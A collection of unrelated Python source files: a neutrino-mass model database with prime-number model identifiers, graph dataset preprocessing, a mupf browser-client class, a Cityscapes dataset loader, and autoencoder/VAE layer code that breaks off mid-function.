prod = reduce(operator.mul, group)
indices += list(self[self["democratic_num"] == prod].index)
indices.remove(index)
return self.loc[indices]
class ModelDatabase:
def __init__(
self,
path: str,
philosophy: str = "democratic",
criterion: str = "mass",
data=None,
):
self.philosophy = philosophy
self.criterion = criterion
self.is_forced = False
assert self.philosophy in {"democratic", "stringent"}
assert self.criterion in {"mass", "dimension"}
if data is None:
self.path = path
# print("Initialising database...")
filenames = glob(os.path.join(self.path, "*.dat"))
mvdb_data = [dict(read_completions(f)) for f in filenames]
mv_dict = {k: v for d in mvdb_data for k, v in d.items()}
self.data = mv_dict
else:
self.path = None
self.is_ordered = True
self.data = data
# initialise prime dictionary
exotics = {}
counter = 1
for k, v in self.data.items():
for model in v:
for exotic in model.quantum_numbers:
if exotic not in exotics:
exotics[conjugate_field(exotic)] = prime(counter)
exotics[exotic] = prime(counter)
counter += 1
# dict mapping exotic field (str representation) to unique prime number
self.exotic_prime_dict = exotics
self.inv_exotic_prime_dict = {v: k for k, v in self.exotic_prime_dict.items()}
term_dict = {}
counter = 1
for k, v in self.data.items():
for model in v:
n_terms = len(model.head["terms"])
for i in range(n_terms):
# sort all of the terms by side effect
term = tuple(sorted(model.head["terms"][i]))
model.head["terms"][i] = term
if term not in term_dict:
# add conj term first so that when filtering you keep
# the unconjugated term
term_dict[conjugate_term(term)] = prime(counter)
term_dict[term] = prime(counter)
counter += 1
# dict mapping sorted tuple of strings representing interaction (and
# conjugate) to unique prime number
self.term_prime_dict = term_dict
self.inv_term_prime_dict = {v: k for k, v in self.term_prime_dict.items()}
# dict mapping operator label to neutrino-mass scale estimate
self.scale_dict = None
self.symbolic_scale_dict = None
# 2D array with number of models rejected from completions of jth
# ordered operator because a subset features in completions of ith
# ordered operator
self.filter_data = np.zeros([len(self.data), len(self.data)])
@property
def is_democratic(self):
return self.philosophy == "democratic"
@property
def is_stringent(self):
return self.philosophy == "stringent"
@property
def is_mass(self):
return self.criterion == "mass"
@property
def is_dimension(self):
return self.criterion == "dimension"
def query(self, func):
"""Function that acts on each model"""
return {k: [m for m in v if func(m)] for k, v in self.data.items()}
def filter_by_query(self, func):
"""Alter internal data from results of query by side effect"""
self.data = self.query(func)
@classmethod
def no_seesaws(cls, model):
"""Aux. query to remove seesaw fields"""
no_seesaws = (
lambda m: not m.contains_field("F,00,2,0,0")
and not m.contains_field("F,00,0,0,0")
and not m.contains_field("S,00,2,1,0")
)
return no_seesaws(model)
# model number is the product of primes representing the model
def democratic_model_number(self, model):
"""Product of primes representing the fields in the model"""
prod = 1
for qn in model.quantum_numbers:
prod *= self.exotic_prime_dict[qn]
return prod
def stringent_model_number(self, model):
"""Product of primes representing the terms in the Lagrangian of the model"""
prod = 1
for term in model.head["terms"]:
prod *= self.term_prime_dict[term]
return prod
def model_number(self, model):
"""General dispatch for model number"""
if self.is_democratic:
return self.democratic_model_number(model)
return self.stringent_model_number(model)
def force(self):
"""Upgrade internal data from LazyCompletion objects to Completion objects. May
take a while to run, probably filter the database down a little before
running this.
"""
if self.is_forced:
return
self.is_forced = True
for k, v in self.data.items():
self.data = {k: [m.force() for m in v]}
def democratic_remove_equivalent_models(self):
"""Removes duplicate models only by field content"""
from neutrinomass.utils.functions import remove_equivalent_nopop
def eq(x, y):
return self.democratic_model_number(x) == self.democratic_model_number(y)
for k, v in self.data.items():
self.data[k] = remove_equivalent_nopop(v, eq_func=eq)
def stringent_remove_equivalent_models(self):
"""Removes duplicate models by interaction terms in the Lagrangian"""
from neutrinomass.utils.functions import remove_equivalent_nopop
def eq(x, y):
return self.stringent_model_number(x) == self.stringent_model_number(y)
for k, v in self.data.items():
self.data[k] = remove_equivalent_nopop(v, eq_func=eq)
def remove_equivalent_models(self):
"""General dispatch function for removing equivalent models"""
if self.is_democratic:
return self.democratic_remove_equivalent_models()
return self.stringent_remove_equivalent_models()
def filter_model_by_mass(self, op: str, model, keep_filter_data=False):
"""Remove all completions with the same or a subset of the particle content of
an upstream model by the neutrino-mass criterion, i.e. only keep
leading-order contributions to the neutrino mass.
Dispatch on filtering philosophy handled by call to `model_number`.
"""
op_scale = self.scale_dict[op]
sieve = self.model_number(model)
for k, v in self.data.items():
if self.scale_dict[k] >= op_scale:
continue
new_v = []
for test_model in v:
if self.model_number(test_model) % sieve != 0:
new_v.append(test_model)
continue
if keep_filter_data:
ordered_op_label_list = list(self.data)
sieve_op_pos = ordered_op_label_list.index(op)
other_op_pos = ordered_op_label_list.index(k)
self.filter_data[sieve_op_pos][other_op_pos] += 1 / len(v)
self.data[k] = new_v
def filter_one_loop_weinberg(self, democratic_nums):
one_loop_scale = 605520000000.0 / (16 * math.pi ** 2)
for k, v in self.data.items():
if self.scale_dict[k] >= one_loop_scale:
continue
new_v = []
for model in v:
for n in democratic_nums:
if self.democratic_model_number(model) % n == 0:
keep = False
break
else:
keep = True
if keep:
new_v.append(model)
self.data[k] = new_v
def filter_models_by_mass(self, op: str):
for model in self.data[op]:
self.filter_model_by_mass(op, model)
def filter_by_mass(self):
for op in self.data:
self.filter_models_by_mass(op)
def filter_model_by_dimension(self, op: str, model):
"""Remove all completions with the same or a subset of the particle content of
an upstream model by the dimension criterion, i.e. only keep models that
would imply lower dimensional operators.
Dispatch on filtering philosophy handled by call to `model_number`.
"""
from neutrinomass.completions import EFF_OPERATORS
from neutrinomass.completions import DERIV_EFF_OPERATORS
ops = {**EFF_OPERATORS, **DERIV_EFF_OPERATORS}
op_dim = ops[op].mass_dimension
sieve = self.model_number(model)
for k, v in self.data.items():
if ops[k].mass_dimension <= op_dim:
continue
new_v = []
for test_model in v:
if self.model_number(test_model) % sieve != 0:
new_v.append(test_model)
continue
ordered_op_label_list = list(self.data)
sieve_op_pos = ordered_op_label_list.index(op)
other_op_pos = ordered_op_label_list.index(k)
self.filter_data[sieve_op_pos][other_op_pos] += 1 / len(v)
self.data[k] = new_v
def filter_models_by_dimension(self, op: str):
for model in self.data[op]:
self.filter_model_by_dimension(op, model)
def filter_by_dimension(self):
for op in self.data:
self.filter_models_by_dimension(op)
def filter(self):
"""Filter dispatch on filtering criterion"""
if not self.is_ordered:
self.order()
if self.is_mass:
self.filter_by_mass()
else:
self.filter_by_dimension()
def fill_scale_dict(self):
from neutrinomass.database import neutrino_mass_estimate
from neutrinomass.database import numerical_np_scale_estimate
from neutrinomass.completions import EFF_OPERATORS
from neutrinomass.completions import DERIV_EFF_OPERATORS
scale_dict, symbolic_scale_dict = {}, {}
ops = {**EFF_OPERATORS, **DERIV_EFF_OPERATORS}
for k, v in ops.items():
estimates = neutrino_mass_estimate(v)
max_scale = 0
max_symbolic_scale = None
for symbolic_expr in estimates:
scale = numerical_np_scale_estimate(symbolic_expr)
if scale > max_scale:
max_scale = scale
max_symbolic_scale = symbolic_expr
assert max_scale > 0
assert max_symbolic_scale is not None
scale_dict[k] = max_scale
symbolic_scale_dict[k] = max_symbolic_scale
self.scale_dict = scale_dict
self.symbolic_scale_dict = symbolic_scale_dict
def order_by_mass(self):
"""Provides `scale_dict` and orders the data dictionary by neutrino mass scale
prediction.
Currently does the same as fill_scale_dict but also orders data
"""
from neutrinomass.database import neutrino_mass_estimate
from neutrinomass.database import numerical_np_scale_estimate
from neutrinomass.completions import EFF_OPERATORS
from neutrinomass.completions import DERIV_EFF_OPERATORS
def scale_pred(op):
return max(
numerical_np_scale_estimate(i) for i in neutrino_mass_estimate(op)
)
ops = {**EFF_OPERATORS, **DERIV_EFF_OPERATORS}
scales = {k: scale_pred(v) for k, v in ops.items() if k in self.data}
mv_ordered = dict(reversed(sorted(scales.items(), key=lambda x: x[1])))
self.scale_dict = {k: v for k, v in mv_ordered.items()}
self.data = {k: self.data[k] for k, v in mv_ordered.items()}
self.is_ordered = True
def order_by_dimension(self):
"""Orders the data dictionary by operator dimension"""
from neutrinomass.completions import EFF_OPERATORS
from neutrinomass.completions import DERIV_EFF_OPERATORS
ops = {**EFF_OPERATORS, **DERIV_EFF_OPERATORS}
sorted_data = sorted(
self.data.items(), key=lambda kv: ops[kv[0]].mass_dimension
)
self.data = dict(sorted_data)
self.is_ordered = True
def order(self):
"""General dispatch on order by filtering criterion"""
if self.is_mass:
self.order_by_mass()
else:
self.order_by_dimension()
def process(self, filter_seesaws=False):
"""All common preprocessing steps in one function"""
if filter_seesaws:
# print("Removing seesaw fields...")
self.filter_by_query(ModelDatabase.no_seesaws)
# print("Removing equivalent models...")
self.remove_equivalent_models()
# print("Ordering by neutrino-mass scales...")
self.order()
# print("Filtering democratically by neutrino-mass estimate...")
self.filter()
DATA = pickle.load(open(os.path.join(os.path.dirname(__file__), "democratic.p"), "rb"))
EXOTICS = pickle.load(open(os.path.join(os.path.dirname(__file__), "exotics.p"), "rb"))
TERMS = pickle.load(open(os.path.join(os.path.dirname(__file__), "terms.p"), "rb"))
MVDF = ModelDataFrame.new(data=DATA, exotics=EXOTICS, terms=TERMS)
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
import random
import torch
import numpy as np
import torch_geometric.datasets
from ogb.graphproppred import PygGraphPropPredDataset
from ogb.lsc.pcqm4m_pyg import PygPCQM4MDataset
import pyximport
pyximport.install(setup_args={"include_dirs": np.get_include()})
import algos
def convert_to_single_emb(x, offset=512):
feature_num = x.size(1) if len(x.size()) > 1 else 1
feature_offset = 1 + torch.arange(0, feature_num * offset, offset, dtype=torch.long)
x = x + feature_offset
return x
def preprocess_item(item):
num_virtual_tokens = 1
edge_attr, edge_index, x = item.edge_attr, item.edge_index, item.x
if edge_attr is None:
edge_attr = torch.zeros((edge_index.shape[1]), dtype=torch.long)
N = x.size(0)
x = convert_to_single_emb(x) # For ZINC: [n_nodes, 1]
# node adj matrix [N, N] bool
adj_orig = torch.zeros([N, N], dtype=torch.bool)
adj_orig[edge_index[0, :], edge_index[1, :]] = True
# edge feature here
if len(edge_attr.size()) == 1:
edge_attr = edge_attr[:, None]
attn_edge_type = torch.zeros([N, N, edge_attr.size(-1)], dtype=torch.long)
attn_edge_type[edge_index[0, :], edge_index[1, :]] = (
convert_to_single_emb(edge_attr) + 1
) # [n_nodes, n_nodes, 1] for ZINC
shortest_path_result, path = algos.floyd_warshall(
adj_orig.numpy()
) # [n_nodesxn_nodes, n_nodesxn_nodes]
max_dist = np.amax(shortest_path_result)
edge_input = algos.gen_edge_input(max_dist, path, attn_edge_type.numpy())
rel_pos = torch.from_numpy((shortest_path_result)).long()
attn_bias = torch.zeros(
[N + num_virtual_tokens, N + num_virtual_tokens], dtype=torch.float
) # with graph token
adj = torch.zeros(
[N + num_virtual_tokens, N + num_virtual_tokens], dtype=torch.bool
)
adj[edge_index[0, :], edge_index[1, :]] = True
for i in range(num_virtual_tokens):
adj[N + i, :] = True
adj[:, N + i] = True
# for i in range(N + num_virtual_tokens):
# for j in range(N + num_virtual_tokens):
# val = True if random.random() < 0.3 else False
# adj[i, j] = adj[i, j] or val
# combine
item.x = x
item.adj = adj
item.attn_bias = attn_bias
item.attn_edge_type = attn_edge_type
item.rel_pos = rel_pos
item.in_degree = adj_orig.long().sum(dim=1).view(-1)
item.out_degree = adj_orig.long().sum(dim=0).view(-1)
item.edge_input = torch.from_numpy(edge_input).long()
item.adj = adj
return item
class MyGraphPropPredDataset(PygGraphPropPredDataset):
def download(self):
super(MyGraphPropPredDataset, self).download()
def process(self):
super(MyGraphPropPredDataset, self).process()
def __getitem__(self, idx):
if isinstance(idx, int):
item = self.get(self.indices()[idx])
item.idx = idx
return preprocess_item(item)
else:
return self.index_select(idx)
class MyPygPCQM4MDataset(PygPCQM4MDataset):
def download(self):
super(MyPygPCQM4MDataset, self).download()
def process(self):
super(MyPygPCQM4MDataset, self).process()
def __getitem__(self, idx):
if isinstance(idx, int):
item = self.get(self.indices()[idx])
item.idx = idx
return preprocess_item(item)
else:
return self.index_select(idx)
class MyZINCDataset(torch_geometric.datasets.ZINC):
def download(self):
super(MyZINCDataset, self).download()
def process(self):
super(MyZINCDataset, self).process()
def __getitem__(self, idx):
if isinstance(idx, int):
item = self.get(self.indices()[idx])
item.idx = idx
return preprocess_item(item)
else:
return self.index_select(idx)
class MyCoraDataset(torch_geometric.datasets.Planetoid):
def download(self):
super(MyCoraDataset, self).download()
def process(self):
super(MyCoraDataset, self).process()
def __getitem__(self, idx):
if isinstance(idx, int):
item = self.get(self.indices()[idx])
item.idx = idx
return preprocess_item(item)
else:
return self.index_select(idx)
|
import json
import queue
import weakref
import mupf.exceptions as exceptions
import time
from .. import _command
from .. import _enhjson as enhjson
from .. import _features as F
from .. import _symbols as S
from .._remote import CallbackTask, RemoteObj
from ..log import loggable, LogManager
from . import _crrcan
from .._srvthr import Client_SrvThrItf
@loggable(
'client/base.py/*<obj>',
log_path=False,
long = lambda self: f"<{type(self).__name__} {getattr(self, '_cid', '?')[0:6]}>",
long_det = lambda self: f"<{type(self).__name__} {getattr(self, '_cid', '?')[0:6]}>"
)
class Client(Client_SrvThrItf):
"""
Object of this class represents a window of a browser.
It is not called "Window", because ``window`` is already a top-level object of the JS-side, and this object is a
little more than that. A :class:`~mupf._remote.RemoteObj` of ``window`` can be obtained by :attr:`window`.
"""
@loggable(log_results=False)
def __init__(self, app, client_id):
self._app_wr = weakref.ref(app)
self._cid = client_id
app._clients_by_cid[client_id] = self
self._user_agent = None
self.features = set()
self.enhjson_decoders = {
"@": self.get_remote_obj,
}
self._callback_queue = queue.Queue()
self._healthy_connection = True # FIXME: this should not start as True by default
self.command = _command.create_command_class_for_client(self)
""" A ``command`` class used in command invoking syntax. """
self.window = RemoteObj(0, self)
""" A :class:`~mupf._remote.RemoteObj` object representing the ``window`` object on the JS-side. """
self._remote_obj_byid = weakref.WeakValueDictionary()
self._clbid_by_callbacks = {}
self._callbacks_by_clbid = {}
self._callback_free_id = 0
Client_SrvThrItf.__init__(self)
# This callback unblocks `self.run_one_callback_blocking()`, otherwise the goggles - do nothing.
self._get_callback_id(log_debug, '*close*')
def _send(self, data):
if F.core_features in self.features:
data[3] = enhjson.EnhancedBlock(data[3])
data = enhjson.encode(data, escape=self._escape_for_json)
Client_SrvThrItf._send(self, data)
def _escape_for_json(self, value):
""" Encoding advanced types for JSON transport
This method is used by :func:`mupf._enhjson.encode` to encode all types byond dicts, arrays, floats etc. It
should return either a :class:`enhjson.JsonElement` enum member or a tuple. The tuple is the escape structure
for an advanced type (handler and arguments).
We can here get a help from :func:`enhjson.test_element_type` function that will return a
:class:`enhjson.JsonElement` enum member if it can.
"""
if isinstance(value, RemoteObj):
return '@', value[S.rid]
json_type = enhjson.test_element_type(value)
if json_type == enhjson.JsonElement.Unknown:
if callable(value):
return '$', None, self._get_callback_id(value)
else:
# If we're here, `value` should have `.enh_json_esc()` method or fail
return enhjson.JsonElement.Autonomous
else:
return json_type
@loggable(log_enter=False)
def __bool__(self):
# for `while client:` syntax
return self._healthy_connection
@loggable()
def _decode_crrcan_msg(self, raw_json):
msg = json.loads(raw_json)
if F.core_features in self.features:
msg[3] = enhjson.decode_enhblock(msg[3], self.enhjson_decoders)
if msg[0] == 1 and msg[2] != 0:
error_data = msg[3]['result']
if line_id := self._app_wr()._identify_line_in_code(error_data[2:5]):
error_data[2:5] = line_id
msg[3]['result'] = exceptions.create_from_result(error_data)
return msg
@loggable()
def get_remote_obj(self, rid, ctxrid=None):
if rid == 0:
return self.window
if (rid, ctxrid) in self._remote_obj_byid:
return self._remote_obj_byid[(rid, ctxrid)]
else:
if ctxrid is None:
rem_obj = RemoteObj(rid, self, None)
else:
rem_obj = RemoteObj(rid, self, self.get_remote_obj(ctxrid))
self._remote_obj_byid[(rid, ctxrid)] = rem_obj
return rem_obj
@loggable(log_results=False)
def summoned(self):
self._safe_dunders_feature = (F.safe_dunders in self.features)
if F.strict_feature_list in self.features and self.features != self.app._features:
raise ValueError(f'features computed {self.features} different from requested {self.app._features} while `strict_feature_list` feature turned on')
@loggable()
def close(self, dont_wait=False, _dont_remove_from_app=False): # TODO: dont_wait not implemented
if self._healthy_connection:
# This command triggers the closing of the websocket connection in normal way.
last_cmd_ccid = self.command('*last*')().result
if not _dont_remove_from_app:
del self.app._clients_by_cid[self._cid]
@loggable()
def await_connection(self):
pass
@loggable()
def install_javascript(self, code=None, *, src=None, remove=True):
if code is not None and src is None:
return self.command('*install*')(code, remove=remove)
elif src is not None and code is None:
return self.command('*install*')(src=src, remove=remove)
else:
raise ValueError('you must provide just one of `code` or `src`')
@loggable()
def install_commands(self, code=None, src=None):
self.install_javascript(code, src=src, remove=True).result
if F.core_features in self.features:
self.command._legal_names = self.command('*getcmds*')().result
@loggable()
def _get_callback_id(self, func, clbid=None):
if func in self._clbid_by_callbacks:
return self._clbid_by_callbacks[func]
else:
if clbid is None:
clbid = self._callback_free_id
self._callback_free_id += 1
elif clbid in self._callbacks_by_clbid:
raise ValueError(f'Callback id `{clbid!r}` already in use for callback `{self._callbacks_by_clbid[clbid]!r}`')
self._clbid_by_callbacks[func] = clbid
self._callbacks_by_clbid[clbid] = func
return clbid
@loggable()
def run_one_callback_blocking(self):
if not self._healthy_connection:
self.run_callbacks_nonblocking() # This is to run all notifications (callbacks will be supressed)
return
callback_task = self._callback_queue.get(block=True)
callback_task.run()
@loggable()
def run_callbacks_nonblocking(self, count_limit=None, time_limit=None):
t0 = time.time()
count = 0
while True:
if (
(time_limit is not None and time.time() >= t0+time_limit)
or (count_limit is not None and count >= count_limit)
):
break
try:
callback_task = self._callback_queue.get_nowait()
except queue.Empty:
break
else:
callback_task.run(only_notifications = not self._healthy_connection)
count += 1
@loggable()
def run_callbacks_blocking_until_closed(self, silent_user_close=True):
# if silent_user_close try/except ClosedUnexpectedly etc...
while self:
self.run_one_callback_blocking()
@property
@loggable('*.:', log_enter=False)
def app(self):
return self._app_wr()
@property
@loggable('*.:', log_enter=False)
def cid(self):
return self._cid
@property
@loggable('*.:', log_enter=False)
def url(self):
return f"http://{self.app._host}:{self.app._port}/mupf/{self.cid}/"
def _get_eventloop(self):
return self._app_wr()._event_loop
@loggable('client/base.py/debug')
def log_debug(*args, **kwargs):
pass
@loggable('client/base.py/sending_event', hidden=True)
def log_sending_event(part, *args, **kwargs):
pass
@loggable('client/base.py/send_task_body')
class LogSentTaskBody(LogManager):
current_writer_id = None
def on(self):
count = self.employ_sentinels('client/base.py/sending_event')
if count > 0:
super().on()
else:
super().off()
def off(self):
self.dismiss_all_sentinels()
super().off()
def on_event(self, event):
if self.state:
if event.entering():
finish = False
if event.arg('part') == 'start':
wr = self.new_writer()
self.current_writer_id = wr.id_
else:
wr = self.find_writer(id_=self.current_writer_id)
if event.arg('part') == 'end':
finish = True
self.delete_writer(self.current_writer_id)
self.current_writer_id = None
wr.write(self.format_args(event.args[1:], event.kwargs), finish)
|
<reponame>rubendfcosta/neural
from os import listdir
from os.path import join
import cv2
from numpy import array
from torch.utils.data import Dataset
class Cityscapes(Dataset):
CLASSES = array([
'unlabeled', 'ego vehicle', 'rectification border', 'out of roi',
'static', 'dynamic', 'ground', 'road', 'sidewalk', 'parking',
'rail track', 'building', 'wall', 'fence', 'guard rail',
'bridge', 'tunnel', 'pole', 'polegroup', 'traffic light',
'traffic sign', 'vegetation', 'terrain', 'sky', 'person',
'rider', 'car', 'truck', 'bus', 'caravan', 'trailer', 'train',
'motorcycle', 'bicycle', 'license plate'])
TRAIN_MAPPING = array([
255, 255, 255, 255, 255, 255, 255, 0, 1, 255, 255, 2, 3, 4, 255,
255, 255, 5, 255, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 255,
255, 16, 17, 18, 255])
def __init__(self, root_dir, split='train', type='semantic', transforms=None):
self.type = type
def generate_examples(images_dir, labels_dir, annotation='fine'):
labels_type = 'gtFine' if annotation == 'fine' else 'gtCoarse'
cities = listdir(images_dir)
for city in cities:
city_dir = join(images_dir, city)
for f in listdir(city_dir):
id = f[:-16]
image = join(images_dir, city, f)
semantic = join(labels_dir, city,
f'{id}_{labels_type}_labelIds.png')
instance = join(labels_dir, city,
f'{id}_{labels_type}_instanceIds.png')
if type == 'semantic':
yield {'image': image, 'label': semantic}
elif type == 'instance':
yield {'image': image, 'label': instance}
elif type == 'panotic':
yield {
'image': image,
'semantic': semantic,
'instance': instance,
}
if not isinstance(split, list):
split = [split]
self.examples = []
if 'train' in split:
self.examples += list(generate_examples(
join(root_dir, 'leftImg8bit', 'train'),
join(root_dir, 'gtFine', 'train'),
'fine'
))
elif 'valid' in split:
self.examples += list(generate_examples(
join(root_dir, 'leftImg8bit', 'val'),
join(root_dir, 'gtFine', 'val'),
'fine'
))
elif 'trainextra' in split:
self.examples += list(generate_examples(
join(root_dir, 'leftImg8bit', 'train_extra'),
join(root_dir, 'gtCoarse', 'train_extra'),
'coarse'
))
self.transforms = transforms if transforms is not None else dict
def __len__(self):
return len(self.examples)
def __getitem__(self, index):
example = self.examples[index]
image = example['image']
image = cv2.imread(image, cv2.IMREAD_COLOR)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
if self.type == 'semantic':
label = cv2.imread(example['label'], cv2.IMREAD_GRAYSCALE)
label = self.TRAIN_MAPPING[label]
return self.transforms(image=image, mask=label)
elif self.type == 'instance':
label = cv2.imread(example['label'], cv2.IMREAD_GRAYSCALE)
return self.transforms(image=image, mask=label)
elif self.type == 'panotic':
semantic = cv2.imread(example['semantic'], cv2.IMREAD_GRAYSCALE)
semantic = self.TRAIN_MAPPING[semantic]
instance = cv2.imread(example['instance'], cv2.IMREAD_GRAYSCALE)
return self.transforms(
image=image,
semantic=semantic,
instance=instance)
else:
raise RuntimeError("Invalid cityscapes dataset type.")
|
# -*- coding: utf-8 -*-
#
# Author: <NAME> <<EMAIL>>
#
# Layers for the autoencoder(s)
from __future__ import print_function, absolute_import, division
from sklearn.base import BaseEstimator
from sklearn.externals import six
import tensorflow as tf
import numpy as np
from abc import ABCMeta, abstractmethod
from ..utils import overrides, get_random_state, DTYPE
from .base import _validate_positive_integer, _validate_float
__all__ = [
'GaussianDenseLayer',
'SymmetricalAutoEncoderTopography',
'SymmetricalVAETopography',
'XavierDenseLayer'
]
def _chain_layers(layers, tensor):
result = tensor
for layer in layers:
result = layer.feed_forward(result)
return result
class _BaseSymmetricalTopography(BaseEstimator):
def __init__(self, X_placeholder, n_hidden, input_shape, activation, layer_type,
dropout, bias_strategy, random_state, **kwargs):
# validate layer dims
if not isinstance(n_hidden, list):
if not isinstance(n_hidden, (int, np.int)):
raise ValueError('n_hidden must be an int or list')
n_hidden = [n_hidden]
# validate layer types
if layer_type not in PERMITTED_LAYER_TYPES:
raise ValueError('layer_type must be one of %r' % list(PERMITTED_LAYER_TYPES.keys()))
LayerClass = PERMITTED_LAYER_TYPES[layer_type]
# validate random state
random_state = get_random_state(random_state)
# set encode/decode
(self.encode, self.decode,
self.encode_layers_, self.decode_layers_) = self._initialize_layers(X_placeholder=X_placeholder,
n_hidden=n_hidden,
input_shape=input_shape,
LayerClass=LayerClass,
activation=activation,
dropout=dropout,
bias_strategy=bias_strategy,
random_state=random_state,
**kwargs)
# set up the shape of the architecture
shape = []
for e in self.encode_layers_:
shape.append(e.fan_in)
last_decode = None
for d in self.decode_layers_:
last_decode = d
shape.append(d.fan_in)
# tack on the output shape
shape.append(last_decode.fan_out)
self.shape = tuple(shape)
@abstractmethod
def _initialize_layers(self, X_placeholder, n_hidden, input_shape, LayerClass, activation,
dropout, bias_strategy, random_state, **kwargs):
"""Initialize all the layers"""
# We know it's a list. There will be two times as many layers as the length of n_hidden:
# n_hidden * encode layer, and n_hidden * decode layer. Since the dimensions are
# piped into one another, stagger them (zipped with a lag), and then reverse for
# the decode layer.
def get_weights_biases(self):
"""Get a list of the weights and biases.
Returns
-------
weights : tuple
A tuple of ``tf.Tensor`` values that correspond to
the weights layers.
biases : tuple
A tuple of ``tf.Variable`` values that correspond
to the bias vectors.
"""
return list(zip(*[(layer.w_, layer.b_) for layer in (self.encode_layers_ + self.decode_layers_)]))
class SymmetricalAutoEncoderTopography(_BaseSymmetricalTopography):
"""The architecture of the neural network. This connects layers together given
the ``layer_type``.
Parameters
----------
X_placeholder : TensorFlow placeholder
The placeholder for ``X``.
n_hidden : int or list
The shape of the hidden layers. This will be reflected, i.e., if the provided value
is ``[100, 50]``, the full topography will be ``[100, 50, 100]``
input_shape : int
The number of neurons in the input layer.
activation : callable
The activation function.
layer_type : str
The type of layer, i.e., 'xavier'. This is the type of layer that
will be generated. One of {'xavier', 'gaussian'}
dropout : float, optional (default=1.0)
Dropout is a mechanism to prevent over-fitting a network. Dropout functions
by randomly dropping hidden units (and their connections) during training.
This prevents units from co-adapting too much.
bias_strategy : str, optional (default='zeros')
The strategy for initializing the bias vector. Default is 'zeros' and will
initialize all bias values as zeros. The alternative is 'ones', which will
initialize all bias values as ones.
random_state : int, ``np.random.RandomState`` or None, optional (default=None)
The numpy random state for seeding random TensorFlow variables in weight initialization.
Attributes
----------
encode_layers_ : list
The encode layers
decode_layers_ : list
The decode layers
shape : tuple
The architecture shape
"""
def __init__(self, X_placeholder, n_hidden, input_shape, activation, layer_type='xavier', dropout=1.,
bias_strategy='zeros', random_state=None):
super(SymmetricalAutoEncoderTopography, self).__init__(X_placeholder=X_placeholder,
n_hidden=n_hidden,
input_shape=input_shape,
activation=activation,
layer_type=layer_type,
dropout=dropout,
bias_strategy=bias_strategy,
random_state=random_state)
@overrides(_BaseSymmetricalTopography)
def _initialize_layers(self, X_placeholder, n_hidden, input_shape, LayerClass, activation,
dropout, bias_strategy, random_state, **kwargs):
n_hidden.insert(0, input_shape)
encode_dimensions = list(zip(n_hidden[:-1], n_hidden[1:]))
decode_dimensions = [(v, k) for k, v in reversed(encode_dimensions)] # pyramid back to n_features
seed = random_state.seed_value
# this procedure creates a symmetrical topography
encode_layers, decode_layers = [], []
n_layers = len(encode_dimensions)
for i in range(n_layers):
encode_fan = encode_dimensions[i]
decode_fan = decode_dimensions[i]
# build them simultaneously without duplicated code
enc_dec_layers = tuple(
LayerClass(fan_in=dims[0], fan_out=dims[1],
activation=activation, dropout=dropout,
bias_strategy=bias_strategy,
seed=seed)
for dims in (encode_fan, decode_fan)
)
# split the tuple
encode_layers.append(enc_dec_layers[0])
decode_layers.append(enc_dec_layers[1])
# the encode/decode operations
encoder = _chain_layers(encode_layers, X_placeholder)
decoder = _chain_layers(decode_layers, encoder)
return encoder, decoder, encode_layers, decode_layers
class SymmetricalVAETopography(_BaseSymmetricalTopography):
"""The architecture of the VAE autoencoder. This connects layers together given
the ``layer_type`` and provides the structure for the inferential network as well
as the generative network.
Parameters
----------
X_placeholder : TensorFlow placeholder
The placeholder for ``X``.
n_hidden : int or list
The shape of the hidden layers. This will be reflected, i.e., if the provided value
is ``[100, 50]``, the full topography will be ``[100, 50, 100]``
input_shape : int
The number of neurons in the input layer.
activation : callable
The activation function.
n_latent_factors : int or float
The size of the latent factor layer learned by the ``VariationalAutoEncoder``
layer_type : str
The type of layer, i.e., 'xavier'. This is the type of layer that
will be generated. One of {'xavier', 'gaussian'}
dropout : float, optional (default=1.0)
Dropout is a mechanism to prevent over-fitting a network. Dropout functions
by randomly dropping hidden units (and their connections) during training.
This prevents units from co-adapting too much.
bias_strategy : str, optional (default='zeros')
The strategy for initializing the bias vector. Default is 'zeros' and will
initialize all bias values as zeros. The alternative is 'ones', which will
initialize all bias values as ones.
random_state : int, ``np.random.RandomState`` or None, optional (default=None)
The numpy random state for seeding random TensorFlow variables in weight initialization.
Attributes
----------
encode_layers_ : list
The encode layers
decode_layers_ : list
The decode layers
shape : tuple
The architecture shape
"""
def __init__(self, X_placeholder, n_hidden, input_shape, activation, n_latent_factors, layer_type='xavier',
dropout=1., bias_strategy='zeros', random_state=None):
# validate n_latent_factors
self.n_latent_factors = n_latent_factors
if isinstance(self.n_latent_factors, (int, np.int)):
self.n_latent_factors = _validate_positive_integer(self, 'n_latent_factors')
else:
# otherwise, if it's a float, we are going to compress the n_features by that amount
if isinstance(self.n_latent_factors, (float, np.float)):
compress = _validate_float(self, 'n_latent_factors', 1.0)
self.n_latent_factors = max(2, int(round(compress * input_shape)))
else:
raise TypeError('n_latent_factors must be an int or a float')
# python lets us call the super constructor anywhere in the constructor
super(SymmetricalVAETopography, self).__init__(X_placeholder=X_placeholder,
n_hidden=n_hidden,
input_shape=input_shape,
activation=activation,
layer_type=layer_type,
dropout=dropout,
bias_strategy=bias_strategy,
random_state=random_state,
**{'n_latent_factors': self.n_latent_factors})
@staticmethod
def _gaussian_sample(mu, log_sigma, random_state):
with tf.name_scope('gaussian_sample'):
epsilon = tf.random_normal(tf.shape(log_sigma), name='epsilon',
seed=random_state.seed_value,
dtype=DTYPE)
return tf.add(mu, tf.multiply(epsilon, tf.exp(log_sigma))) # N(mu, I * sigma**2)
@overrides(_BaseSymmetricalTopography)
def _initialize_layers(self, X_placeholder, n_hidden, input_shape, LayerClass, activation,
dropout, bias_strategy, random_state, **kwargs):
n_latent = kwargs.pop('n_latent_factors') # will be there because we're injecting it in the super constructor
seed = random_state.seed_value
# AE makes it easy to string layers together, but the VAE is a bit more
# complex. So we'll use the _chain method that will string layers together
# I.e., _chain([layer_1, layer_2]) -> layer_2(layer_1(x))
# inject input_shape like in AE
n_hidden.insert(0, input_shape)
encode_dimensions = list(zip(n_hidden[:-1], n_hidden[1:]))
decode_dimensions = [(v, k) for k, v in reversed(encode_dimensions)]
# insert the dims for the latent -> decode dimensions
decode_dimensions.insert(0, (n_latent, n_hidden[-1]))
encoding_layers = [
LayerClass(fan_in=fan_in, fan_out=fan_out,
activation=activation, dropout=dropout,
bias_strategy=bias_strategy,
seed=seed)
for fan_in, fan_out in encode_dimensions
]
# chain:
encode = _chain_layers(encoding_layers, X_placeholder)
# add the latent distribution ("hidden code")
# z ~ N(z_mean, exp(z_log_sigma) ** 2)
